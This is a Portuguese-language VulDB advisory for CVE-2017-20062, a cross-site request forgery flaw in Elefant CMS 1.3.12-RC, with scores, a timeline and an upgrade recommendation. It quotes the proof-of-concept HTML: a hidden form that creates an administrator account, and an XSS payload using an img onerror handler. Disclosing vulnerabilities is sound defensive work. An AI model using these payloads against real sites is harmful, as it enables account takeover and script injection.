Elefant CMS 1.3.12-RC Falsificação de Pedido Cross Site

CVSS Meta Temp scorePreço de exploração actual (≈)Nota de Interesse CTI
4.3$0-$5k0.11

Uma vulnerabilidade foi encontrada em Elefant CMS 1.3.12-RC. Foi declarada como problemático. Afectado é uma função desconhecida. A manipulação com uma entrada desconhecida leva a Falsificação de Pedido Cross Site. A definição de CWE para a vulnerabilidade é CWE-352. O aconselhamento é partilhado para download em seclists.org.

A vulnerabilidade é identificada como CVE-2017-20062. O ataque pode ser levado a cabo através da rede. Não há detalhes técnicos disponíveis. A complexidade de um ataque é bastante elevada. A exploração é conhecida por ser difícil. A vulnerabilidade não é bem conhecida. Além disso, há uma exploração disponível. A exploração foi divulgada ao público e pode ser utilizada.

É declarado como proof-of-concept. A exploração está disponível em seclists.org. A vulnerabilidade foi tratada como uma exploração não pública de dia zero durante pelo menos 283 dias. Esperamos que o dia 0 tenha valido aproximadamente $0-$5k. O código utilizado pela exploração é:

<html> <body> <form action="http://localhost/user/add"; method
="POST"> <input type="hidden" name="name" value="admin3" /> <input type=
"hidden" name="email" value="admin3 () example com" /> <input type="hidden" name=
"password" value="admin3" /> <input type="hidden" name="verify_pass" value=
"admin3" /> <input type="hidden" name="type" value="admin" /> <input type=
"hidden" name="company" value="" /> <input type="hidden" name="title" value=""
/> <input type="hidden" name="website" value="" /> <input type="hidden" name=
"photo" value="" /> <input type="hidden" name="about" value="" /> <input type=
"hidden" name="phone" value="" /> <input type="hidden" name="fax" value="" />
<input type="hidden" name="address" value="" /> <input type="hidden" name=
"address2" value="" /> <input type="hidden" name="city" value="" /> <input type
="hidden" name="state" value="" /> <input type="hidden" name="country" value=""
/> <input type="hidden" name="zip" value="" /> <input type="submit" value=
"Submit request" /> </form> </body> </html> XSS: <html> <body> <form action=
"http://localhost/designer/preview"; method="POST"> <input type="hidden" name=
"layout" value="<img src=no onerror=alert(1)>" /> <input type="submit" value=
"Submit request" /> </form> </body> </html>

A actualização para a versão 1.3.13 é capaz de abordar esta questão. Recomenda-se a actualização do componente afectado.

Produtoinformação

Tipo

Fabricante

Nome

Versão

CPE 2.3informação

CPE 2.2informação

CVSSv4informação

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Vector: 🔍
VulDB Fiabilidade: 🔍

CVSSv3informação

VulDB Meta Pontuação Base: 5.0
VulDB Meta Temp score: 4.3

VulDB Pontuação Base: 5.0
VulDB Pontuação da Tempestade: 4.3
VulDB Vector: 🔍
VulDB Fiabilidade: 🔍

CVSSv2informação

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VectorComplexidadeAutenticaçãoConfidencialidadeIntegridadeDisponibilidade
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear

VulDB Pontuação Base: 🔍
VulDB Pontuação da Tempestade: 🔍
VulDB Fiabilidade: 🔍

Researcher Pontuação Base: 🔍

Exploraçãoinformação

Classe: Falsificação de Pedido Cross Site
CWE: CWE-352 / CWE-862 / CWE-863
CAPEC: 🔍
ATT&CK: 🔍

Local: Não
Remoto: Sim

Disponibilidade: 🔍
Aceda a: Público
Estado: Proof-of-Concept
Autor: Tim Coen
Descarregar: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Tendência dos preços: 🔍
Estimativa de preço actual: 🔍

0-DayDesbloquearDesbloquearDesbloquearDesbloquear
HojeDesbloquearDesbloquearDesbloquearDesbloquear

Inteligência de Ameaçasinformação

Interesse: 🔍
Actores Activos: 🔍
Grupos APT activos: 🔍

Contra-medidasinformação

Recomendação: Actualização
Estado: 🔍

Tempo 0-Dia: 🔍
Tempo de atraso de exploração: 🔍

Actualização: CMS 1.3.13

Linha do tempoinformação

09/05/2016 🔍
16/02/2017 +283 Dias 🔍
16/02/2017 +0 Dias 🔍
24/02/2017 +8 Dias 🔍
18/06/2022 +1940 Dias 🔍

Fontesinformação

Aconselhamento: Elefant CMS 1.3.12-RC: CSRF
Pessoa: Tim Coen
Empresa: Curesec Research Team
Estado: Não definido

CVE: CVE-2017-20062 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013
Veja também: 🔍

Entradainformação

Criado em: 24/02/2017 15h48
Actualizado em: 18/06/2022 16h19
Ajustamentos: 24/02/2017 15h48 (55), 24/02/2017 15h49 (2), 18/06/2022 16h19 (3)
Completo: 🔍

Discussão

Ainda sem comentários. Idiomas: pt + en.

Por favor inicie sessão para comentar.

Do you want to use VulDB in your project?

Use the official API to access entries easily!